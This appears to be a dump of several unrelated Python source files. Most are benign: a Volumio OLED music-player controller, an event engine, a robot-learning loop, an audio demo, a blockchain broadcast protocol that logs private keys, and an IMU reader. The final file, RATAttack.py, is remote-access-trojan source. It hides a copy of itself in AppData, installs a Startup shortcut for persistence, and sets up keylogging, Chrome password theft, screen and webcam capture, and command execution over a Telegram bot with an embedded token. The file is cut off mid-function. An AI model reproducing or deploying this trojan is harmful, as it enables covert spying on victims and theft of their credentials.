elif oled.state == STATE_PLAYER and oled.playState == 'stop':
volumioIO.emit('listPlaylist')
oled.stateTimeout = 10.0
SetState(STATE_PLAYLIST_MENU)
elif oled.state == STATE_PLAYLIST_MENU or oled.state == STATE_QUEUE_MENU or oled.state == STATE_LIBRARY_MENU:
oled.modal.NextOption()
def ButtonC_PushEvent(hold_time):
global UPDATE_INTERVAL
if hold_time < 3 and oled.state != STATE_LIBRARY_INFO:
#shortpress functions below
print('ButtonC short press event')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
volumioIO.emit('prev')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
oled.stateTimeout = 6.0
SetState(STATE_QUEUE_MENU)
#Longpress functions below
elif oled.state == STATE_PLAYER and oled.playState != 'stop':
print('ButtonC long press event')
if oled.repeatTag == False:
volumioIO.emit('setRepeat', {"value":"true"})
oled.repeatTag = True
elif oled.randomTag == True:
volumioIO.emit('setRepeat', {"value":"false"})
oled.repeatTag = False
def ButtonD_PushEvent(hold_time):
global UPDATE_INTERVAL
b_obj = BytesIO()
crl = pycurl.Curl()
if hold_time < 3:
#shortpress functions below
print('ButtonD short press event')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
volumioIO.emit('next')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
SetState(STATE_LIBRARY_INFO)
oled.playState = 'info'
crl.setopt(crl.URL, 'localhost:3000/api/v1/collectionstats')
crl.setopt(crl.WRITEDATA, b_obj)
crl.perform()
crl.close()
get_body = b_obj.getvalue()
onPushCollectionStats(get_body)
sleep(0.5)
elif oled.state == STATE_LIBRARY_INFO:
SetState(STATE_PLAYER)
onPushState(OPDsave)
elif oled.state == STATE_PLAYLIST_MENU:
LoadPlaylist(oled.playlistoptions[oled.modal.SelectedOption()])
elif oled.state == STATE_LIBRARY_MENU:
oled.stateTimeout = 10.0
EnterLibraryItem(oled.modal.SelectedOption())
elif oled.state == STATE_QUEUE_MENU:
oled.playPosition = oled.modal.SelectedOption()
emit_track = True # return to player mode
#Longpress functions below
elif oled.state == STATE_PLAYER and oled.playState != 'stop':
print('ButtonD long press event')
if oled.randomTag == False:
volumioIO.emit('setRandom', {"value":"true"})
oled.randomTag = True
elif oled.randomTag == True:
volumioIO.emit('setRandom', {"value":"false"})
oled.randomTag = False
def RightKnob_RotaryEvent(dir):
global emit_track
if oled.state == STATE_PLAYLIST_MENU or oled.state == STATE_LIBRARY_MENU:
oled.stateTimeout = 10.0
if dir == RotaryEncoder.LEFT:
oled.modal.PrevOption()
elif dir == RotaryEncoder.RIGHT:
oled.modal.NextOption()
elif oled.state == STATE_QUEUE_MENU:
oled.stateTimeout = 6.0
if dir == RotaryEncoder.LEFT:
oled.modal.PrevOption()
elif dir == RotaryEncoder.RIGHT:
oled.modal.NextOption()
oled.playPosition = oled.modal.SelectedOption()
emit_track = True
elif oled.state == STATE_PLAYER and oled.playState != 'stop':
oled.stateTimeout = 10.0
SetState(STATE_QUEUE_MENU)
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_LIBRARY_INFO:
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
def RightKnob_PushEvent(hold_time):
if hold_time < 1:
#shortpress fuctions below
print ('RightKnob_PushEvent SHORT')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
if oled.playState == 'play':
volumioIO.emit('pause')
else:
volumioIO.emit('play')
elif oled.state == STATE_PLAYER and oled.playState == 'stop':
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_LIBRARY_INFO:
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_PLAYLIST_MENU:
LoadPlaylist(oled.playlistoptions[oled.modal.SelectedOption()])
elif oled.state == STATE_LIBRARY_MENU:
oled.stateTimeout = 10.0
EnterLibraryItem(oled.modal.SelectedOption())
elif oled.state == STATE_QUEUE_MENU:
oled.playPosition = oled.modal.SelectedOption()
emit_track = True # return to player mode
#longpress functions below
else:
print ('RightKnob_PushEvent')
if oled.state == STATE_PLAYER and oled.playState != 'stop':
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
elif oled.state == STATE_LIBRARY_INFO:
oled.stateTimeout = 10.0
volumioIO.emit('browseLibrary',{'uri':'music-library'})
#Down below is the defenition for the physical buttons.
#Sample: RightKnob_Push = PushButton(27, max_time=1) -> GPIO 27 is used
#Which Button is conected to which GPIO? (regarding to wiring diagram Maschine2501/Volumio-OledUI)
# Button A: GPIO 4
# Button B: GPIO 17
# Button C: GPIO 5
# Button D: GPIO 6
# Button right-Rotary: GPIO 27
ButtonA_Push = PushButton(4, max_time=3)
ButtonA_Push.setCallback(ButtonA_PushEvent)
ButtonB_Push = PushButton(17, max_time=1)
ButtonB_Push.setCallback(ButtonB_PushEvent)
ButtonC_Push = PushButton(5, max_time=3)
ButtonC_Push.setCallback(ButtonC_PushEvent)
ButtonD_Push = PushButton(6, max_time=3)
ButtonD_Push.setCallback(ButtonD_PushEvent)
RightKnob_Push = PushButton(27, max_time=1)
RightKnob_Push.setCallback(RightKnob_PushEvent)
RightKnob_Rotation = RotaryEncoder(22, 23, pulses_per_cycle=4)
RightKnob_Rotation.setCallback(RightKnob_RotaryEvent)
#IR receiver is connected to port 13
show_logo("volumio_logo.ppm", oled)
sleep(2)
SetState(STATE_PLAYER)
updateThread = Thread(target=display_update_service)
updateThread.daemon = True
updateThread.start()
def _receive_thread():
volumioIO.wait()
receive_thread = Thread(target=_receive_thread)
receive_thread.daemon = True
receive_thread.start()
volumioIO.on('pushState', onPushState)
#volumioIO.on('pushcollectionstats', onPushCollectionStats)
volumioIO.on('pushListPlaylist', onPushListPlaylist)
volumioIO.on('pushQueue', onPushQueue)
volumioIO.on('pushBrowseSources', onPushBrowseSources)
volumioIO.on('pushBrowseLibrary', onLibraryBrowse)
# get list of Playlists and initial state
volumioIO.emit('listPlaylist')
volumioIO.emit('getState')
volumioIO.emit('getQueue')
#volumioIO.emit('collectionstats')
#volumioIO.emit('getBrowseSources')
sleep(0.1)
#def timeupdate()
# start_time = datetime.datetime.now()
try:
with open('oledconfig.json', 'r') as f: #load last playing track number
config = json.load(f)
except IOError:
pass
else:
oled.playPosition = config['track']
if oled.playState != 'play':
volumioIO.emit('play', {'value':oled.playPosition})
varcanc = True #helper for pause -> stop timeout counter
InfoTag = 0 #helper for missing Artist/Song when changing sources
while True:
if emit_volume:
emit_volume = False
print("volume: " + str(oled.volume))
volumioIO.emit('volume', oled.volume)
if emit_track and oled.stateTimeout < 4.5:
emit_track = False
try:
print('Track selected: ' + str(oled.playPosition+1) + '/' + str(len(oled.queue)) + ' ' + oled.queue[oled.playPosition].encode('ascii', 'ignore'))
except IndexError:
pass
volumioIO.emit('play', {'value':oled.playPosition})
sleep(0.1)
#this is the loop to get artist/song when changing sources (loops three times)
if oled.state == STATE_PLAYER and InfoTag <= 3 and newStatus != 'stop':
oled.modal.UpdatePlayingInfo(oled.activeArtist, oled.activeSong, oled.activeFormat, oled.activeSamplerate, oled.activeBitdepth, oled.playIcon, oled.pauseIcon, oled.stopIcon, oled.prevIcon, oled.nextIcon)
InfoTag += 1
sleep(1.5)
#this is the loop to push the actual time every 0.1sec to the "Standby-Screen"
if oled.state == STATE_PLAYER and newStatus == 'stop' and oled.ShutdownFlag == False:
InfoTag = 0 #resets the InfoTag helper from artist/song update loop
oled.time = strftime("%H:%M:%S")
oled.modal.UpdateStandbyInfo(oled.time, oled.IP, oled.date, oled.libraryIcon, oled.playlistIcon, oled.queueIcon, oled.libraryInfo)
#if playback is paused, here is defined when the Player goes back to "Standby"/Stop
if oled.state == STATE_PLAYER and newStatus == 'pause' and varcanc == True:
secvar = int(round(time()))
varcanc = False
elif oled.state == STATE_PLAYER and newStatus == 'pause' and int(round(time())) - secvar > 15:
varcanc = True
volumioIO.emit('stop')
sleep(0.1)
|
engine.py
|
"""
Event-driven framework of vn.py framework.
"""
import sys
from collections import defaultdict
from queue import Empty, Queue
from threading import Thread
from time import sleep, time
from typing import Any, Callable
EVENT_TIMER = "eTimer"
class Event:
"""
Event object consists of a type string which is used
by event engine for distributing event, and a data
object which contains the real data.
"""
def __init__(self, type: str, data: Any = None):
""""""
self.type = type
self.data = data
# Defines handler function to be used in event engine.
HandlerType = Callable[[Event], None]
class EventEngine:
"""
Event engine distributes event object based on its type
to those handlers registered.
It also generates timer event by every interval seconds,
which can be used for timing purpose.
"""
def __init__(self, interval: int = 1, debug: bool = False, over_ms: int = 500):
"""
Timer event is generated every 1 second by default, if
interval not specified.
增强模式:
debug: performance debug
over_ms: over micro seconds for each handler execution.
add try catch handel event exception
"""
self._interval = interval
self._queue = Queue()
self._active = False
self._debug = debug
self._over_ms = over_ms
self._thread = Thread(target=self._run)
self._timer = Thread(target=self._run_timer)
self._handlers = defaultdict(list)
self._general_handlers = []
def _run(self):
"""
Get event from queue and then process it.
"""
while self._active:
try:
event = self._queue.get(block=True, timeout=1)
self._process(event) if not self._debug else self._process_debug(event)
except Empty:
pass
def _process_debug(self, event: Event):
"""
process event with debug mode:
1.performance
2.try catch exception
"""
for handler in self._handlers[event.type]:
t1 = time()
handler_name = str(handler.__qualname__)
try:
handler(event)
except Exception as ex:
print(f'运行 {event.type} {handler_name} 异常:{str(ex)}',
file=sys.stderr)
continue
t2 = time()
execute_ms = (int(round(t2 * 1000))) - (int(round(t1 * 1000)))
if execute_ms > self._over_ms:
print(f'运行{event.type} {handler_name} 耗时:{execute_ms}ms >{self._over_ms}ms',
file=sys.stderr)
if self._general_handlers:
for handler in self._general_handlers:
t1 = time()
handler_name = str(handler.__qualname__)
handler(event)
t2 = time()
execute_ms = (int(round(t2 * 1000))) - (int(round(t1 * 1000)))
if execute_ms > self._over_ms:
print(f'运行 general {event.type} {handler_name} 耗时:{execute_ms}ms > {self._over_ms}ms',
file=sys.stderr)
def _process(self, event: Event):
"""
First ditribute event to those handlers registered listening
to this type.
Then distrubute event to those general handlers which listens
to all types.
"""
if event.type in self._handlers:
[handler(event) for handler in self._handlers[event.type]]
if self._general_handlers:
[handler(event) for handler in self._general_handlers]
def _run_timer(self):
"""
Sleep by interval second(s) and then generate a timer event.
"""
while self._active:
sleep(self._interval)
event = Event(EVENT_TIMER)
self.put(event)
def start(self):
"""
Start event engine to process events and generate timer events.
"""
self._active = True
self._thread.start()
self._timer.start()
def stop(self):
"""
Stop event engine.
"""
self._active = False
self._timer.join()
self._thread.join()
def put(self, event: Event):
"""
Put an event object into event queue.
"""
self._queue.put(event)
def register(self, type: str, handler: HandlerType):
"""
Register a new handler function for a specific event type. Every
function can only be registered once for each event type.
"""
handler_list = self._handlers[type]
if handler not in handler_list:
handler_list.append(handler)
def unregister(self, type: str, handler: HandlerType):
"""
Unregister an existing handler function from event engine.
"""
handler_list = self._handlers[type]
if handler in handler_list:
handler_list.remove(handler)
if not handler_list:
self._handlers.pop(type)
def register_general(self, handler: HandlerType):
"""
Register a new handler function for all event types. Every
function can only be registered once for each event type.
"""
if handler not in self._general_handlers:
self._general_handlers.append(handler)
def unregister_general(self, handler: HandlerType):
"""
Unregister an existing general handler function.
"""
if handler in self._general_handlers:
self._general_handlers.remove(handler)
|
algo_with_multi.py
|
import sys
import os
import time
import threading
import numpy as np
from robolearn.old_utils.algo_interface import AlgoInterface
from robolearn.old_envs.manipulator2d.manipulator2d_env import Manipulator2dEnv
from robolearn.old_utils.ros_utils import get_available_port
init_roscore_port = 11312
init_gzserver_port = 11347
class SimpleRLAlgo(object):
def __init__(self, N, T, ts):
interface_fcns = [(self.stop, 'stop'), (self.start, 'start'), (self.restart, 'restart'),
(self.is_running_fcn, 'is_running'), (self.kill_me, 'kill')]
self.algo_interface = AlgoInterface(interface_fcns)
self.n_iterations = N
self.T = T
self.Ts = ts
self.is_running = False
self.is_training = False
self.is_finished = False
self.total_gz_ros = 2
self.rosgazebos = [None for _ in range(self.total_gz_ros)]
self.roscore_ports = [None for _ in range(self.total_gz_ros)]
self.gzserver_ports = [None for _ in range(self.total_gz_ros)]
for ii in range(self.total_gz_ros):
if ii == 0:
last_roscore_port = init_roscore_port
last_gzserver_port = init_gzserver_port
else:
last_roscore_port = self.roscore_ports[ii-1] + 1
last_gzserver_port = self.gzserver_ports[ii-1] + 1
self.roscore_ports[ii] = get_available_port('localhost', last_roscore_port)
self.gzserver_ports[ii] = get_available_port('localhost', last_gzserver_port)
self.rosgazebos[ii] = Manipulator2dEnv('localhost', roscore_port=self.roscore_ports[ii],
gzserver_port=self.gzserver_ports[ii])
self.rosgazebos[ii].start()
self.running_thread = threading.Thread(target=self.running, args=[])
self.running_thread.setDaemon(True)
self.running_thread.start()
def start(self):
print("This is starting")
self.is_running = True
return True
def running(self):
while not self.is_finished:
if self.is_running:
self.is_training = True
for nn in range(self.n_iterations):
if self.is_running is False:
break
# Interaction
for ii in range(self.total_gz_ros):
self.rosgazebos[ii].reset(time=None, freq=None, cond=0)
for t in range(self.T):
if self.is_running is False:
break
for ii in range(self.total_gz_ros):
# get obs/state
print("State env[%d]: %s" % (ii, self.rosgazebos[ii].get_observation()))
# act
self.rosgazebos[ii].send_action(np.random.randn(3))
print("Iteration %d/%d, time=%d/%d" % (nn+1, self.n_iterations, t+1, self.T))
time.sleep(self.Ts)
# Evaluation
# Update
self.is_training = False
def restart(self):
print("This is restarting")
self.stop()
while self.is_training:
pass
self.start()
return True
def stop(self):
print("This is stopping")
self.is_running = False
return True
def is_running_fcn(self):
print("Is this running?: %s " % self.is_running)
return self.is_running
def kill_me(self):
print("This is killing itself!!")
self.finish()
for ii in range(self.total_gz_ros):
self.rosgazebos[ii].stop()
self.stop()
del self
return True
def finish(self):
self.is_finished = True
if __name__ == "__main__":
try:
simple_algo = SimpleRLAlgo(20, 100, 0.2)
simple_algo.start()
while not simple_algo.is_finished:
pass
except KeyboardInterrupt:
print('Interrupted')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
print("This algorithm has been finished!!")
|
MultiplesStreams.py
|
import pyaudio
import wave
import time
import threading
wf = wave.open("audio/bird.wav", 'rb')
wf2 = wave.open("audio/cat.wav", 'rb')
#init obj
p = pyaudio.PyAudio()
p2 = pyaudio.PyAudio()
# define callback (2)
def callback1(in_data, frame_count, time_info, status):
data = wf.readframes(frame_count)
return (data, pyaudio.paContinue)
def callback2(in_data, frame_count, time_info, status):
data2 = wf2.readframes(frame_count)
return (data2, pyaudio.paContinue)
def worker(streams, wfs):
streams.start_stream()
while streams.is_active():
time.sleep(0.1)
streams.stop_stream()
streams.close()
wfs.close()
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True,
stream_callback=callback1)
stream2 = p2.open(format=p2.get_format_from_width(wf2.getsampwidth()),
channels=wf2.getnchannels(),
rate=wf2.getframerate(),
output=True,
stream_callback=callback2)
t = threading.Thread(target=worker, args=(stream, wf,), name='primero')
w = threading.Thread(target=worker, args=(stream2, wf2,), name='segundo')
w.start()
t.start()
while w.isAlive and t.is_alive():
time.sleep(0.1)
p.terminate()
|
protocols.py
|
import multiprocessing
import logging.config
import threading
import hashlib
import logging
import queue
import uuid
import time
import sys
import os
import module
logging.config.fileConfig(os.path.join(os.path.dirname(__file__), "logging.conf"))
logger = logging.getLogger("tamperproofbroadcast")
class FOTB(module.Module):
def _createTransaction(self, privkey, pubkeyhash, prevtxhash, message):
logger.debug(
"creating transaction: %s", (privkey, pubkeyhash, prevtxhash, message)
)
payload = self._pack(message)
inputs = [{"txid": prevtxhash, "vout": 0, "sequence": 0}]
outputs = {pubkeyhash: 0}
data = [payload]
transaction = self.southbound.createrawtransaction(inputs, outputs, data)
signedtransaction = self.southbound.signrawtransaction(
transaction, [], [privkey]
)["hex"]
return signedtransaction
def _unpackTransaction(self, txhex):
try:
logger.debug("unpacking transaction: %s", txhex)
transaction = self.southbound.decoderawtransaction(txhex)
payload = transaction["vout"][1]["data"][0]
message = self._unpack(payload)
pubkeyhash = self.southbound.decoderawtransaction(
self.southbound.getrawtransaction(transaction["vin"][0]["txid"])
)["vout"][0]["scriptPubKey"]["addresses"][0]
txhash = transaction["txid"]
return pubkeyhash, txhash, message
except Exception as e:
logger.debug("error unpacking: %s", e)
def _sendTransaction(self, signedtransaction):
logger.debug("sending transaction: %s", signedtransaction)
txhash = self.southbound.sendrawtransaction(signedtransaction)
return txhash
def _start(self):
self.southbound._start()
if self.prevtxhash is None and self.privkey is None and self.pubkeyhash is None:
(
self.privkey,
self.pubkeyhash,
self.prevtxhash,
transaction,
) = self.southbound._create_funded_keypair()
self.lock.acquire()
self.waiting[self.prevtxhash] = transaction
self.lock.release()
logger.info(
"starting blockchain broadcast: privkey=%s pubkey=%s prevtxhash=%s"
% (self.privkey, self.pubkeyhash, self.prevtxhash)
)
threading.Thread(target=self._timeout_append, daemon=True).start()
threading.Thread(target=self._timeout_deliver, daemon=True).start()
threading.Thread(target=self._timeout_broadcast, daemon=True).start()
def _stop(self):
self.stop_event.set()
time.sleep(1)
self.southbound._stop()
def __init__(
self,
privkey=None,
pubkeyhash=None,
prevtxhash=None,
queuesize=2 ** 7,
startheight=0,
):
self.southbound = None
self.filesystem = None
self.waiting = {}
self.delivered = {}
self.lock = threading.Lock()
self.ledger = []
self.privkey = privkey
self.pubkeyhash = pubkeyhash
self.pid = pubkeyhash
self.prevtxhash = prevtxhash
self.queue = queue.Queue(maxsize=queuesize)
self.deliverqueue = queue.Queue(maxsize=queuesize)
self.startheight = int(startheight)
self.stop_event = threading.Event()
def broadcast(self, message):
logger.debug("broadcast: %s", message)
self.queue.put(message)
def _timeout_broadcast(self):
while not self.stop_event.is_set():
t = time.time()
size = 0
messages = []
while True:
try:
message = self.queue.get_nowait()
messages.append(message)
size += sys.getsizeof(message)
except:
pass
if t + 0.1 < time.time() or size > 2 ** 11:
break
if messages != []:
signedtransaction = self._createTransaction(
self.privkey, self.pubkeyhash, self.prevtxhash, messages
)
self.prevtxhash = self._sendTransaction(signedtransaction)
self.lock.acquire()
self.waiting[self.prevtxhash] = signedtransaction
self.lock.release()
time.sleep(0.1)
def _timeout_append(self):
while not self.stop_event.is_set():
logger.debug("upon timeout (append)")
self.lock.acquire()
for txhash, signedtransaction in self.waiting.items():
logger.debug("trigger append: %s", txhash)
self._sendTransaction(signedtransaction)
self.lock.release()
time.sleep(600.0)
def _timeout_deliver(self):
while not self.stop_event.is_set():
try:
logger.debug("upon timeout (deliver)")
logger.debug("trigger get")
bbh = self.southbound.getbestblockhash()
newledger = []
if len(self.ledger) == 0:
if self.startheight == 0:
self.ledger = [None]
else:
self.ledger = [
self.southbound.getblock(self.startheight - 1, 1).get(
"previousblockhash", None
)
]
while bbh not in self.ledger:
newledger.append(bbh)
bbh = self.southbound.getblock(bbh, 1).get(
"previousblockhash", None
)
newledger.reverse()
self.oldledger = self.ledger[self.ledger.index(bbh) + 1 :]
self.ledger = self.ledger[: self.ledger.index(bbh) + 1]
self.ledger.extend(newledger)
for block in self.oldledger:
for transaction in self.southbound.getblock(block, 2)["tx"]:
try:
utx = self._unpackTransaction(transaction["hex"])
if utx == None:
continue
pid, txid, messages = utx
if txid in self.delivered:
self.lock.acquire()
if txid in self.waiting:
self.waiting[txid] = transaction["hex"]
self.lock.release()
except Exception as e:
logger.error("error: %s", e)
logger.debug("upon getreturn: newledger=...%s" % newledger[-6:])
for block in newledger:
for transaction in self.southbound.getblock(block, 2)["tx"]:
try:
utx = self._unpackTransaction(transaction["hex"])
if utx == None:
continue
pid, txid, messages = utx
if txid in self.delivered:
continue
self.delivered[txid] = transaction["hex"]
for message in messages:
logger.debug(
"trigger deliver: pid=%s; txid=%s; message=%s"
% (pid, txid, message)
)
self.deliverqueue.put((pid, txid, message))
self.lock.acquire()
if txid in self.waiting:
self.waiting.pop(txid)
self.lock.release()
except Exception as e:
logger.error("error: %s", e)
time.sleep(1.0)
except Exception as e:
logger.error("error: %s", e)
raise
def deliver(self, blocking=False):
if blocking == False:
try:
return self.deliverqueue.get_nowait()
except:
raise Exception({"error": "nothing to deliver"})
else:
return self.deliverqueue.get()
def _create(self):
self.southbound._create()
def _uncreate(self):
self.southbound._uncreate()
class TOTB(module.Module):
def _createTransaction(self, privkey, pubkeyhash, prevtxhash, message):
logger.debug(
"creating transaction: %s", (privkey, pubkeyhash, prevtxhash, message)
)
payload = self._pack(message)
inputs = [{"txid": prevtxhash, "vout": 0, "sequence": 0}]
outputs = {pubkeyhash: 0}
data = [payload]
transaction = self.southbound.createrawtransaction(inputs, outputs, data)
signedtransaction = self.southbound.signrawtransaction(
transaction, [], [privkey]
)["hex"]
return signedtransaction
def _unpackTransaction(self, txhex):
try:
logger.debug("unpacking transaction: %s", txhex)
transaction = self.southbound.decoderawtransaction(txhex)
payload = transaction["vout"][1]["data"][0]
message = self._unpack(payload)
pubkeyhash = self.southbound.decoderawtransaction(
self.southbound.getrawtransaction(transaction["vin"][0]["txid"])
)["vout"][0]["scriptPubKey"]["addresses"][0]
txhash = transaction["txid"]
return pubkeyhash, txhash, message
except Exception as e:
logger.debug("error unpacking: %s", e)
def _sendTransaction(self, signedtransaction):
logger.debug("sending transaction: %s", signedtransaction)
txhash = self.southbound.sendrawtransaction(signedtransaction)
return txhash
def _start(self):
self.southbound._start()
if self.prevtxhash is None and self.privkey is None and self.pubkeyhash is None:
(
self.privkey,
self.pubkeyhash,
self.prevtxhash,
transaction,
) = self.southbound._create_funded_keypair()
self.lock.acquire()
self.waiting[self.prevtxhash] = transaction
self.lock.release()
logger.info(
"starting blockchain broadcast: privkey=%s pubkey=%s prevtxhash=%s"
% (self.privkey, self.pubkeyhash, self.prevtxhash)
)
threading.Thread(target=self._timeout_append, daemon=True).start()
threading.Thread(target=self._timeout_deliver, daemon=True).start()
threading.Thread(target=self._timeout_broadcast, daemon=True).start()
def _stop(self):
self.stop_event.set()
time.sleep(1)
self.southbound._stop()
def __init__(
self,
privkey=None,
pubkeyhash=None,
prevtxhash=None,
queuesize=2 ** 7,
startheight=0,
):
self.southbound = None
self.filesystem = None
self.waiting = {}
self.lock = threading.Lock()
self.ledger = []
self.confirmed_height = 1
self.privkey = privkey
self.pubkeyhash = pubkeyhash
self.pid = pubkeyhash
self.prevtxhash = prevtxhash
self.queue = queue.Queue(maxsize=queuesize)
self.deliverqueue = queue.Queue(maxsize=queuesize)
self.startheight = int(startheight)
self.stop_event = threading.Event()
def broadcast(self, message):
logger.debug("broadcast: %s", message)
self.queue.put(message)
def _timeout_broadcast(self):
while not self.stop_event.is_set():
t = time.time()
size = 0
messages = []
while True:
try:
message = self.queue.get_nowait()
messages.append(message)
size += sys.getsizeof(message)
except:
pass
if t + 0.1 < time.time() or size > 2 ** 11:
break
if messages != []:
signedtransaction = self._createTransaction(
self.privkey, self.pubkeyhash, self.prevtxhash, messages
)
self.prevtxhash = self._sendTransaction(signedtransaction)
self.lock.acquire()
self.waiting[self.prevtxhash] = signedtransaction
self.lock.release()
time.sleep(0.1)
def _timeout_append(self):
while not self.stop_event.is_set():
logger.debug("upon timeout (append)")
self.lock.acquire()
for txhash, signedtransaction in self.waiting.items():
logger.debug("trigger append: %s", txhash)
self._sendTransaction(signedtransaction)
self.lock.release()
time.sleep(600.0)
def _timeout_deliver(self):
while not self.stop_event.is_set():
try:
logger.debug("upon timeout (deliver)")
logger.debug("trigger get")
bbh = self.southbound.getbestblockhash()
newledger = []
if len(self.ledger) == 0:
if self.startheight == 0:
self.ledger = [None]
else:
self.ledger = [
self.southbound.getblock(self.startheight - 1, 1).get(
"previousblockhash", None
)
]
while bbh not in self.ledger:
newledger.append(bbh)
bbh = self.southbound.getblock(bbh, 1).get(
"previousblockhash", None
)
newledger.reverse()
self.ledger = self.ledger[: self.ledger.index(bbh) + 1]
self.ledger.extend(newledger)
logger.debug("upon getreturn: ledger=...%s" % self.ledger[-6:])
for block in self.ledger[self.confirmed_height : -6]:
self.confirmed_height += 1
for transaction in self.southbound.getblock(block, 2)["tx"]:
try:
utx = self._unpackTransaction(transaction["hex"])
if utx == None:
continue
pid, txid, messages = utx
for message in messages:
logger.debug(
"trigger deliver: pid=%s; txid=%s; message=%s"
% (pid, txid, message)
)
self.deliverqueue.put((pid, txid, message))
self.lock.acquire()
if txid in self.waiting:
self.waiting.pop(txid)
self.lock.release()
except Exception as e:
logger.error("error: %s", e)
time.sleep(5.0)
except Exception as e:
logger.error("error: %s", e)
raise
def deliver(self, blocking=False):
if blocking == False:
try:
return self.deliverqueue.get_nowait()
except:
raise Exception({"error": "nothing to deliver"})
else:
return self.deliverqueue.get()
def _create(self):
self.southbound._create()
def _uncreate(self):
self.southbound._uncreate()
|
IMU_script.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 8 10:42:15 2019
@author: mitchell & stefan
"""
from IMU_module import IMU
import queue
import threading
import time
import sys
import signal
# def run(name,q):
# while True:
# header, data = imu.get_IMU_data()
# timestamp = header[1]
# #data2 = imu2.get_IMU_data()
# """
# DO STUFF
# """
# print("imu data: ", data)
# #print("%f,%d,% 9f,% 9f,% 9f,% 9f,% 9f,% 9f,% 9f" % tuple(data1) )
# #print("% 9f,% 9f,% 9f,% 9f,% 9f,% 9f,% 9f" % tuple(data) )
# q.put((header, data))
# #time.sleep()
def signal_handler(sig, frame):
print("Keyboard Interrupt")
for imu in IMUs:
imu.stop_streaming()
quit()
#send_command_bytes_usb(chr(0x56))
IMUs = []
if __name__ == '__main__':
q1 = queue.Queue()
print("Started")
# global IMUs
IMUs.append(IMU("COM5", frequency=10))
t1 = threading.Thread(target=IMUs[0].start_stream_to_queue, args=(q1,))
t1.start()
signal.signal(signal.SIGINT, signal_handler)
while True:
header1, data1 = q1.get()
#TODO: Exit gracefully
if q1.not_empty:
print("% 9f,% 9f,% 9f,% 9f,% 9f,% 9f,% 9f" % tuple(data1) )
'''
q2 = queue.Queue()
t2 = threading.Thread(target=run, args = ("COM4", q2,))
'''
|
RATAttack.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, os.path, platform, ctypes
os.environ["PBR_VERSION"]='5.0.0'
import logging
from consoleTools import consoleDisplay as cd
from PIL import ImageGrab # /capture_pc
from shutil import copyfile, copyfileobj, rmtree, move # /ls, /pwd, /cd, /copy, /mv
from sys import argv, path, stdout # console output
from json import loads # reading json from ipinfo.io
from winshell import startup # persistence
from tendo import singleton # this makes the application exit if there's another instance already running
from win32com.client import Dispatch # WScript.Shell
from time import strftime, sleep
from subprocess import Popen, PIPE # /cmd_exec
import psutil # updating
import shutil
import win32clipboard # register clipboard
import sqlite3 # get chrome passwords
import win32crypt # get chrome passwords
import base64 # /encrypt_all
import datetime # /schedule
import time
import threading # /proxy, /schedule
import proxy
import pyaudio, wave # /hear
import telepot, requests # telepot => telegram, requests => file download
from telepot.namedtuple import InlineKeyboardMarkup, InlineKeyboardButton
import pyHook, pythoncom # keylogger
import socket # internal IP
import getpass # get username
import collections
import urllib# wallpaper
import cv2#webcam
from datetime import datetime
from ctypes import * #fixing pyinstaller - we need to import all the ctypes to get api-ms-win-crt-*, you will also need https://www.microsoft.com/en-US/download/details.aspx?id=48145
cd.log('i','Starting')
me = singleton.SingleInstance()
# REPLACE THE LINE BELOW WITH THE TOKEN OF THE BOT YOU GENERATED!
token = '794617265:AAHKR0gMla6CQK_lOCqhCNJVhjdnLUeee7o'
# This will be used for setting paths and related file io -- change to whatever you want
app_name = 'ABCdef123'
# ADD YOUR chat_id in string format TO THE LIST BELOW IF YOU WANT YOUR BOT TO ONLY RESPOND TO ONE PERSON!
known_ids = []
#known_ids.append(os.environ['TELEGRAM_CHAT_ID']if 'TELEGRAM_CHAT_ID' in os.environ) # make sure to remove this line if you don't have this environment variable
appdata_roaming_folder = os.environ['APPDATA'] # = 'C:\Users\Username\AppData\Roaming'
# HIDING OPTIONS
# ---------------------------------------------
hide_folder = appdata_roaming_folder + '\\' + app_name # = 'C:\Users\Username\AppData\Roaming\Portal'
compiled_name = app_name + '.exe' # Name of compiled .exe to hide in hide_folder, i.e 'C:\Users\Username\AppData\Roaming\Portal\portal.exe'
# ---------------------------------------------
target_shortcut = startup() + '\\' + compiled_name.replace('.exe', '.lnk')
if not os.path.exists(hide_folder):
os.makedirs(hide_folder)
hide_compiled = hide_folder + '\\' + compiled_name
copyfile(argv[0], hide_compiled)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(target_shortcut)
shortcut.Targetpath = hide_compiled
shortcut.WorkingDirectory = hide_folder
shortcut.save()
if not os.path.exists('logs/'):
os.mkdir('logs/')
if not os.path.exists('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d')))):
f=open('logs/{}-log.txt'.format(str(datetime.now().strftime('%Y-%m-%d'))))
f.close()
global mouseFrozen
destroy = False
keyboardFrozen = False
mouseFrozen = False
curr_window = None
user = os.environ.get("USERNAME") # Windows username to append keylogs
schedule = {}
log_file = hide_folder + '\\.user'
keylogs_file = hide_folder + '\\.keylogs'
with open(log_file, "a") as writing:
writing.write("-------------------------------------------------\n")
writing.write(user + " Log: " + strftime("%b %d@%H:%M") + "\n\n")
logging.basicConfig(filename=log_file,level=logging.DEBUG)
def encode(file):
f = open(file)
data = f.read()
f.close()
encodedBytes = base64.b64encode(data)
#remove old file
os.remove(file)
#tag new file
file = file + '.nxr'
t = open(file, "w+")
t.write(encodedBytes)
t.close()
def decode(file):
f = open(file)
data = f.read()
f.close()
decodedBytes = base64.b64decode(data)
#remove old file
os.remove(file)
#tag new file
file = file.replace('.nxr', '')
t = open(file, "w+")
